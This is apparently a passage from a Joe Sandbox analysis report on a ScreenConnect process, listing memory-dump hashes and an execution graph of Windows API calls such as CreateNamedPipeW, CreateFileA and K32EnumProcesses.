                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d90d0881a00183de89ec8a8ee945c9de8028d8bdd84632e7feb1393ed5b8f9a7
                                                                                                                          • Instruction ID: 54d7b91e2947992b444e23f41d3426bb1b881a873ce1e362d684a21ff05967d9
                                                                                                                          • Opcode Fuzzy Hash: d90d0881a00183de89ec8a8ee945c9de8028d8bdd84632e7feb1393ed5b8f9a7
                                                                                                                          • Instruction Fuzzy Hash: 3CF027313043404FC7015BA5785C1697FE6EFCA7207C544BAE909C7351CE744C09C7A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 515224a4b0061eb22b78f48bf74ba95ad24fe42252fc7b9369abb2c2c9944cc7
                                                                                                                          • Instruction ID: 58b71fb5827c3a596c9504bc1f682dda8b51944f86c8c37801c82a2384390b44
                                                                                                                          • Opcode Fuzzy Hash: 515224a4b0061eb22b78f48bf74ba95ad24fe42252fc7b9369abb2c2c9944cc7
                                                                                                                          • Instruction Fuzzy Hash: DBE09232A082106BD714DEBAA800A9B7BDECBC5224B00C47EA15DC3240ED30D505C7A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 383b0126e54def12d5c5fffcc2d9e54983d0be6d7d8d9707bf3e8ffda4f65759
                                                                                                                          • Instruction ID: 00945417985a63d76928478b417433025a644d84ea0052baf22dfd54dbb8fbcf
                                                                                                                          • Opcode Fuzzy Hash: 383b0126e54def12d5c5fffcc2d9e54983d0be6d7d8d9707bf3e8ffda4f65759
                                                                                                                          • Instruction Fuzzy Hash: 81F0E5363006115B8712A66DE810E5F37DADFC5B61714852DE915C7308DF70ED014BD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 118c33533e92cc60c8a6d867bceea160aa2a57b806f1deddf60bc961265aee37
                                                                                                                          • Instruction ID: 54d84083078a68946052878de90af3aa3b08ece2f5dc0ea6bf2548d1e48305c8
                                                                                                                          • Opcode Fuzzy Hash: 118c33533e92cc60c8a6d867bceea160aa2a57b806f1deddf60bc961265aee37
                                                                                                                          • Instruction Fuzzy Hash: 37E0DFB6E082209FEB202BA974500EAB7E5DA8432431845ABE80AC3612E9659D0A47D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 04bbf77a8287e9e3ace25a30f54b34fdcb910dba32ffe0ad05f02ad24de861ce
                                                                                                                          • Instruction ID: ae6748ef55a5218e274042805c133d5e84ed49def5257cd0dc309a0a33e1bd5c
                                                                                                                          • Opcode Fuzzy Hash: 04bbf77a8287e9e3ace25a30f54b34fdcb910dba32ffe0ad05f02ad24de861ce
                                                                                                                          • Instruction Fuzzy Hash: 43F030313092945FC3066778A81885D3FA5DFEA22135540BBE50ACB2F3CF658C46C7A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 026f158c861a0000ef09c5610452e38e1b987205bdfecbb3f5f2c4d317deedca
                                                                                                                          • Instruction ID: 32772d5c4a37f18ebe88ff7b48a148b75e9237ff80c7915fdf3d82f525f399e3
                                                                                                                          • Opcode Fuzzy Hash: 026f158c861a0000ef09c5610452e38e1b987205bdfecbb3f5f2c4d317deedca
                                                                                                                          • Instruction Fuzzy Hash: 73F0207190A284AFC702CF789C51AAD7FF0DB4630171802EED408E72A3D9304E05A721
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c009591394f1e021b584b5bb1418aae8ba2a3a22e2c7633e51db92ebd9c729a7
                                                                                                                          • Instruction ID: f5425d2d84483459b9644cb7a15384b9f88abb40b7a7561cc20ae646b6d3889e
                                                                                                                          • Opcode Fuzzy Hash: c009591394f1e021b584b5bb1418aae8ba2a3a22e2c7633e51db92ebd9c729a7
                                                                                                                          • Instruction Fuzzy Hash: 00E02632704310578B046AAA788C63EBADAEBCCB713D4403EF20EC3340CEB59C0643A4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 24388692de5b1892cf9af928de247bb3af116dcd08328a775badd9aa7c41948e
                                                                                                                          • Instruction ID: 2a24c73ad44ded907e0948f491283e5e69095fce71007bd98dccb83517f979b6
                                                                                                                          • Opcode Fuzzy Hash: 24388692de5b1892cf9af928de247bb3af116dcd08328a775badd9aa7c41948e
                                                                                                                          • Instruction Fuzzy Hash: 16E09230906308EFD701EBB4E91119D7BB4EB46204B5045D6E409DB212E6306E05CF91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e47715f85c8293c3550e25371ed4b0100f1d80ddb1819f74e6a1e6f78eb90362
                                                                                                                          • Instruction ID: a3c876709ceb885f3082aee000c6d3f7c7454303bff0c61548a5917e8c2939a2
                                                                                                                          • Opcode Fuzzy Hash: e47715f85c8293c3550e25371ed4b0100f1d80ddb1819f74e6a1e6f78eb90362
                                                                                                                          • Instruction Fuzzy Hash: C5E08C62B01C569F8B1091DD9D44555B7CA8B9A36CB3DC672F928CB380FA31DC024390
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ae11ed683e376787975269fd88c691bf9f3fe19cc4bcbb21655f363583faee70
                                                                                                                          • Instruction ID: cc70c68bf4b1ddd77d98557bdbd3de8ecdaf43c0f489d2410731502a8b49bfb9
                                                                                                                          • Opcode Fuzzy Hash: ae11ed683e376787975269fd88c691bf9f3fe19cc4bcbb21655f363583faee70
                                                                                                                          • Instruction Fuzzy Hash: 8CE0923110C7914FC312DB38E4112D87FE2AF92311B490AEAE445CB256DAA57D4D87A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9ebe1cfcf7ad927c2c40e98db5bcdac9308e8f6ba460110a1716a2eda2122e43
                                                                                                                          • Instruction ID: 8a0574be6f44bebbd1ac78f90beb49992c4eebe5c021db6083aac5f3f3ccd8cb
                                                                                                                          • Opcode Fuzzy Hash: 9ebe1cfcf7ad927c2c40e98db5bcdac9308e8f6ba460110a1716a2eda2122e43
                                                                                                                          • Instruction Fuzzy Hash: EAF0393560A390CFC7165B74A86C85CBF72EF4A22631A409AD45A876A2CF3A9845CF12
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e45c268997af49793a7a821cf716cf9486f84dfd82a4e0c0168cd9f7df4e2691
                                                                                                                          • Instruction ID: f36ab424e4d0848c2a0485bad2e4ce0b112add9f4b7df6194f58e7e065fb8b23
                                                                                                                          • Opcode Fuzzy Hash: e45c268997af49793a7a821cf716cf9486f84dfd82a4e0c0168cd9f7df4e2691
                                                                                                                          • Instruction Fuzzy Hash: ACE01A70D06204DFCB40DF6884455EEBFF0EB1A210B1549AAD81AD7611E3324A0ACF91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4823c72ada52fa268ceafcda7dfb127c36571238fbf843f5b3215dc32831f5da
                                                                                                                          • Instruction ID: 960824aa9a2cc6aae4d7bebafa833a260166db465c9278e02a1a4db4cbb55a40
                                                                                                                          • Opcode Fuzzy Hash: 4823c72ada52fa268ceafcda7dfb127c36571238fbf843f5b3215dc32831f5da
                                                                                                                          • Instruction Fuzzy Hash: C7E0EC367001146B83047779E8188AE7EDADFED6623944137E51FD37A0CE719C4287E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38bd4e220c12b8d557f4da96a01e2ae33b64d58077e63c072e3424875db5f76a
                                                                                                                          • Instruction ID: 18f26e88d44e02e706865a18ce6a74862bfc89858fe9811d5baea556935a5f14
                                                                                                                          • Opcode Fuzzy Hash: 38bd4e220c12b8d557f4da96a01e2ae33b64d58077e63c072e3424875db5f76a
                                                                                                                          • Instruction Fuzzy Hash: 11E0DF6118C3C14FC3129768AD68289BFE09F87215F0848DFE5C68B183D169681BCBA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2664b62a5420d9d126dd07d60cc579044a56f062b746ab9feca750b91d0ff9a8
                                                                                                                          • Instruction ID: 028740328b5f639f908af02c9a9eb0435e8c2cee95cf2a0b9720db854f4b3453
                                                                                                                          • Opcode Fuzzy Hash: 2664b62a5420d9d126dd07d60cc579044a56f062b746ab9feca750b91d0ff9a8
                                                                                                                          • Instruction Fuzzy Hash: 60E04670419381CFD380EF78E908408BBE0BF49324F0588AED889CB251E630A946CF52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80308ad8a80e0c98e72ace0dbafc9913dcd891fcc200af40f738aaf779bda951
                                                                                                                          • Instruction ID: aad27fa350a3fd29f0df3a6bc0733d010c2100877e7d7d8836960a026950b4e0
                                                                                                                          • Opcode Fuzzy Hash: 80308ad8a80e0c98e72ace0dbafc9913dcd891fcc200af40f738aaf779bda951
                                                                                                                          • Instruction Fuzzy Hash: CBD01770A01218FF8B00EFA8E901A9DBBF9EB48211B5045ADA408E3204EE716F019B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: da48c7eabb3875501697df9f8ba298aff4629f38b2bb69998d22956e31e9809f
                                                                                                                          • Instruction ID: 712cba3c52f302c9de8e677b121ea4df2f5c14017a54a2cd7e8a9b28387e2e9d
                                                                                                                          • Opcode Fuzzy Hash: da48c7eabb3875501697df9f8ba298aff4629f38b2bb69998d22956e31e9809f
                                                                                                                          • Instruction Fuzzy Hash: 26D01771A0120CEF9B00EFB8E91169DB7F9EB84205BA045A9E509E7214EA716F009B90

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:13.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:294
                                                                                                                          Total number of Limit Nodes:20
                                                                                                                          execution_graph 38564 5830040 38565 5830094 ConnectNamedPipe 38564->38565 38566 58300d0 38565->38566 38566->38566 38724 4fd5f08 38725 4fd5f45 38724->38725 38726 4fd66f6 38725->38726 38727 4fd5f49 38725->38727 38732 4fd9f5a 38725->38732 38740 4fd9cf6 38725->38740 38726->38727 38730 4fd9f5a 8 API calls 38726->38730 38731 4fd9cf6 8 API calls 38726->38731 38730->38727 38731->38727 38734 4fd9dc9 38732->38734 38733 4fd9f89 38733->38726 38734->38733 38748 4fde32f 38734->38748 38755 4fdd93f 38734->38755 38766 4fde326 38734->38766 38773 4fddc97 38734->38773 38781 4fdda08 38734->38781 38742 4fd9d00 38740->38742 38741 4fd9f89 38741->38726 38742->38741 38743 4fdd93f 8 API calls 38742->38743 38744 4fde32f 4 API calls 38742->38744 38745 4fdda08 8 API calls 38742->38745 38746 4fddc97 4 API calls 38742->38746 38747 4fde326 4 API calls 38742->38747 38743->38742 38744->38742 38745->38742 38746->38742 38747->38742 38749 4fde33a 38748->38749 38792 5830250 38749->38792 38798 5830260 38749->38798 38750 4fde416 38751 4fde4cf 38750->38751 38804 5830dc0 38750->38804 38756 4fdd955 38755->38756 38836 4fde589 38756->38836 38841 4fde598 38756->38841 38757 4fde416 38758 4fde4cf 38757->38758 38761 5830dc0 2 API calls 38757->38761 38759 4fdde43 38760 4fdda8f 38760->38759 38764 5830250 2 API calls 38760->38764 38765 5830260 2 API calls 38760->38765 38761->38758 38764->38757 38765->38757 38767 4fde389 38766->38767 38771 5830250 2 API calls 38767->38771 38772 5830260 2 API calls 38767->38772 38768 4fde416 38769 4fde4cf 38768->38769 38770 5830dc0 2 API calls 38768->38770 38770->38769 38771->38768 38772->38768 38775 4fddca3 38773->38775 38774 4fdde43 38775->38774 38779 5830250 2 API calls 38775->38779 38780 5830260 2 API calls 38775->38780 38776 4fde416 38777 4fde4cf 38776->38777 38778 5830dc0 2 API calls 38776->38778 38778->38777 38779->38776 38780->38776 38782 4fdda39 38781->38782 38788 4fde589 4 API calls 38782->38788 38789 4fde598 4 API calls 38782->38789 38783 4fde416 38784 4fde4cf 38783->38784 38787 5830dc0 2 API calls 38783->38787 38785 4fdde43 38786 4fdda8f 38786->38785 38790 5830250 2 API calls 38786->38790 38791 5830260 2 API calls 38786->38791 38787->38784 38788->38786 38789->38786 38790->38783 38791->38783 38793 5830260 38792->38793 38795 5830297 38793->38795 38808 58303af 38793->38808 38794 58302c0 38796 58303af 2 API calls 38794->38796 38795->38750 38796->38795 38799 583027e 38798->38799 38801 5830297 38799->38801 38802 58303af 2 API calls 38799->38802 38800 58302c0 38803 58303af 2 API calls 38800->38803 38801->38750 38802->38800 38803->38801 38831 5830150 CloseHandle 38804->38831 38833 5830149 38804->38833 38805 5830ddb 38805->38751 38809 58303ba 38808->38809 38809->38794 38813 5830541 38809->38813 38818 5830550 38809->38818 38814 5830550 38813->38814 38823 58305a0 38814->38823 38827 5830595 38814->38827 38819 5830563 38818->38819 38821 58305a0 CreateFileA 38819->38821 38822 5830595 CreateFileA 38819->38822 38820 583040f 38820->38794 38821->38820 38822->38820 38825 58305fe CreateFileA 38823->38825 38826 58306d5 38825->38826 38828 58305a0 CreateFileA 38827->38828 38830 58306d5 38828->38830 38832 58301ba 38831->38832 38832->38805 38834 5830150 CloseHandle 38833->38834 38835 58301ba 38834->38835 38835->38805 38837 4fde598 38836->38837 38838 4fde604 38837->38838 38846 6393468 38837->38846 38854 6393458 38837->38854 38838->38760 38842 4fde5bc 38841->38842 38843 4fde604 38842->38843 38844 6393468 4 API calls 38842->38844 38845 6393458 4 API calls 38842->38845 38843->38760 38844->38843 38845->38843 38848 639349c 38846->38848 38849 639348c 38846->38849 38847 6393495 38847->38838 38862 63935d9 38848->38862 38869 63935e8 38848->38869 38849->38847 38850 63935d9 4 API calls 38849->38850 38851 63935e8 4 API calls 38849->38851 38850->38849 38851->38849 38855 639345e 38854->38855 38859 63935d9 4 API calls 38855->38859 38860 63935e8 4 API calls 38855->38860 38861 639348c 38855->38861 38856 6393495 38856->38838 38857 63935d9 4 API calls 38857->38861 38858 63935e8 4 API calls 38858->38861 38859->38861 38860->38861 38861->38856 38861->38857 38861->38858 38865 63935e7 38862->38865 38863 639360d 38864 6393616 38863->38864 38890 6392950 38863->38890 38864->38849 38865->38863 38876 6393768 38865->38876 38883 6393757 38865->38883 38873 63935f5 38869->38873 38870 639360d 38871 6393616 38870->38871 38872 6392950 ProcessIdToSessionId 38870->38872 38871->38849 38872->38870 38873->38870 38874 6393768 2 API calls 38873->38874 38875 6393757 2 API calls 38873->38875 38874->38870 38875->38870 38881 6393792 38876->38881 38882 639377f 38876->38882 38877 6393788 38877->38863 38878 63938fa K32EnumProcesses 38879 6393932 38878->38879 38879->38863 38881->38882 38893 639295c 38881->38893 38882->38877 38882->38878 38887 6393768 38883->38887 38884 6393788 38884->38863 38885 63938fa K32EnumProcesses 38886 6393932 38885->38886 38886->38863 38888 639295c K32EnumProcesses 38887->38888 38889 639377f 38887->38889 38888->38887 38889->38884 38889->38885 38891 63939a0 ProcessIdToSessionId 38890->38891 38892 6393a13 38891->38892 38892->38863 38895 63938a8 K32EnumProcesses 38893->38895 38896 6393932 38895->38896 38896->38881 38567 1f636b0 38569 1f636c6 38567->38569 38568 1f63764 38569->38568 38572 1f6c6ff 38569->38572 38570 1f63739 38573 1f6c72c 38572->38573 38574 1f6c746 38572->38574 38573->38574 38577 1f6cbb0 38573->38577 38582 1f6cbc0 38573->38582 38574->38570 38579 1f6cbe6 38577->38579 38578 1f6cc1e 38578->38574 38579->38578 38587 1f6d078 38579->38587 38595 1f6d069 38579->38595 38584 1f6cbe6 38582->38584 38583 1f6cc1e 38583->38574 38584->38583 38585 1f6d078 CreateNamedPipeW 38584->38585 38586 1f6d069 CreateNamedPipeW 38584->38586 38585->38583 38586->38583 38588 1f6d0a6 38587->38588 38603 1f6dc14 38588->38603 38608 1f6dc18 38588->38608 38589 1f6d346 38589->38589 38590 1f6d2ce 38590->38589 38613 1f6eba0 38590->38613 38617 1f6eb91 38590->38617 38596 1f6d0a6 38595->38596 38599 1f6dc14 CreateNamedPipeW 38596->38599 38600 1f6dc18 CreateNamedPipeW 38596->38600 38597 1f6d346 38597->38597 38598 1f6d2ce 38598->38597 38601 1f6eba0 CreateNamedPipeW 38598->38601 38602 1f6eb91 CreateNamedPipeW 38598->38602 38599->38598 38600->38598 38601->38598 38602->38598 38604 1f6dc3c 38603->38604 38605 1f6dc8b 38604->38605 38621 1f66568 38604->38621 38628 1f66558 38604->38628 38605->38590 38610 1f6dc3c 38608->38610 38609 1f6dc8b 38609->38590 38610->38609 38611 1f66568 CreateNamedPipeW 38610->38611 38612 1f66558 CreateNamedPipeW 38610->38612 38611->38609 38612->38609 38614 1f6ebc5 38613->38614 38615 1f6e270 CreateNamedPipeW 38614->38615 38616 1f6ebdd 38615->38616 38616->38590 38618 1f6eba0 38617->38618 38619 1f6e270 CreateNamedPipeW 38618->38619 38620 1f6ebdd 38619->38620 38620->38590 38622 1f6659b 38621->38622 38623 1f6658b 38621->38623 38622->38623 38626 1f66568 CreateNamedPipeW 38622->38626 38627 1f66558 CreateNamedPipeW 38622->38627 38635 1f6ddc0 38622->38635 38644 1f6ddb0 38622->38644 38623->38605 38626->38623 38627->38623 38629 1f6659b 38628->38629 38632 1f6658b 38628->38632 38630 1f6ddc0 CreateNamedPipeW 38629->38630 38631 1f6ddb0 CreateNamedPipeW 38629->38631 38629->38632 38633 1f66568 CreateNamedPipeW 38629->38633 38634 1f66558 CreateNamedPipeW 38629->38634 38630->38632 38631->38632 38632->38605 38633->38632 38634->38632 38636 1f6dde3 38635->38636 38637 1f6ddf3 38635->38637 38640 1f6ddec 38636->38640 38653 1f6e198 38636->38653 38658 1f6e168 38636->38658 38664 1f6e1a8 38636->38664 38638 1f66568 CreateNamedPipeW 38637->38638 38639 1f66558 CreateNamedPipeW 38637->38639 38638->38636 38639->38636 38640->38623 38645 1f6dde3 38644->38645 38646 1f6ddf3 38644->38646 38649 1f6ddec 38645->38649 38650 1f6e1a8 CreateNamedPipeW 38645->38650 38651 1f6e198 CreateNamedPipeW 38645->38651 38652 1f6e168 CreateNamedPipeW 38645->38652 38647 1f66568 CreateNamedPipeW 38646->38647 38648 1f66558 CreateNamedPipeW 38646->38648 38647->38645 38648->38645 38649->38623 38650->38649 38651->38649 38652->38649 38654 1f6e1c7 38653->38654 38669 1f6e270 38654->38669 38673 1f6e260 38654->38673 38655 1f6e239 38655->38640 38659 1f6e177 38658->38659 38660 1f6e1d9 38658->38660 38659->38640 38662 1f6e270 CreateNamedPipeW 38660->38662 38663 1f6e260 CreateNamedPipeW 38660->38663 38661 1f6e239 38661->38640 38662->38661 38663->38661 38665 1f6e1c7 38664->38665 38667 1f6e270 CreateNamedPipeW 38665->38667 38668 1f6e260 CreateNamedPipeW 38665->38668 38666 1f6e239 38666->38640 38667->38666 38668->38666 38670 1f6e296 38669->38670 38677 4fdcc50 38669->38677 38682 4fdcc80 38669->38682 38670->38655 38674 1f6e296 38673->38674 38675 4fdcc80 CreateNamedPipeW 38673->38675 38676 4fdcc50 CreateNamedPipeW 38673->38676 38674->38655 38675->38674 38676->38674 38678 4fdcc92 38677->38678 38687 4fdccd0 38678->38687 38691 4fdccc0 38678->38691 38679 4fdccb5 38679->38670 38683 4fdcc92 38682->38683 38685 4fdccd0 CreateNamedPipeW 38683->38685 38686 4fdccc0 CreateNamedPipeW 38683->38686 38684 4fdccb5 38684->38670 38685->38684 38686->38684 38688 4fdcce8 38687->38688 38690 4fdd36c CreateNamedPipeW 38688->38690 38689 4fdcd28 38689->38679 38690->38689 38692 4fdcce8 38691->38692 38694 4fdd36c CreateNamedPipeW 38692->38694 38693 4fdcd28 38693->38679 38694->38693 38695 5839998 38696 58399aa 38695->38696 38697 58399ee 38696->38697 38700 583a248 38696->38700 38705 583a258 38696->38705 38701 583a257 38700->38701 38702 583a6c8 38701->38702 38710 1f67910 38701->38710 38715 1f67920 38701->38715 38706 583a283 38705->38706 38707 583a6c8 38706->38707 38708 1f67920 CreateNamedPipeW 38706->38708 38709 1f67910 CreateNamedPipeW 38706->38709 38708->38706 38709->38706 38711 1f67920 38710->38711 38712 1f67965 38711->38712 38713 1f66568 CreateNamedPipeW 38711->38713 38714 1f66558 CreateNamedPipeW 38711->38714 38712->38701 38713->38712 38714->38712 38716 1f6794a 38715->38716 38717 1f67965 38716->38717 38718 1f66568 CreateNamedPipeW 38716->38718 38719 1f66558 CreateNamedPipeW 38716->38719 38717->38701 38718->38717 38719->38717 38720 5830428 38721 5830470 WaitNamedPipeW 38720->38721 38722 583046a 38720->38722 38723 58304a4 38721->38723 38722->38721 38897 4fd7940 38898 4fd7969 38897->38898 38899 4fd79c9 38898->38899 38902 639699f 38898->38902 38907 63969a0 38898->38907 38903 63969b1 38902->38903 38912 639524d 38903->38912 38916 6396a0e 38903->38916 38904 63969da 38904->38898 38908 63969b1 38907->38908 38910 639524d 8 API calls 38908->38910 38911 6396a0e 8 API calls 38908->38911 38909 63969da 38909->38898 38910->38909 38911->38909 38913 639525d 38912->38913 38914 6396aa7 38913->38914 38915 4fd9cf6 8 API calls 38913->38915 38914->38904 38915->38914 38917 6396a11 38916->38917 38918 6396a3c 38917->38918 38919 4fd9cf6 8 API calls 38917->38919 38918->38904 38919->38918

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 282 4fdd498-4fdd4da 283 4fdd4dc-4fdd4df 282->283 284 4fdd4e2-4fdd547 CreateNamedPipeW 282->284 283->284 286 4fdd549-4fdd54f 284->286 287 4fdd550-4fdd571 284->287 286->287
                                                                                                                          APIs
                                                                                                                          • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04FDD534
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2946932055.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_4fd0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                          • String ID: 4L^q
                                                                                                                          • API String ID: 2489174969-616035646
                                                                                                                          • Opcode ID: 4b87795882e321e2c9ca326babd565d93a063264a2709deb3f558d0384079ce2
                                                                                                                          • Instruction ID: 13397a42c19c037ef413e7b96fc211605cd74bc6d5d44f1c8d8d6ee01bafdb16
                                                                                                                          • Opcode Fuzzy Hash: 4b87795882e321e2c9ca326babd565d93a063264a2709deb3f558d0384079ce2
                                                                                                                          • Instruction Fuzzy Hash: A63103B58003489FCB11CF9AD888A8EBFF6BF48314F14C059E918AB221D375A955CF61

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
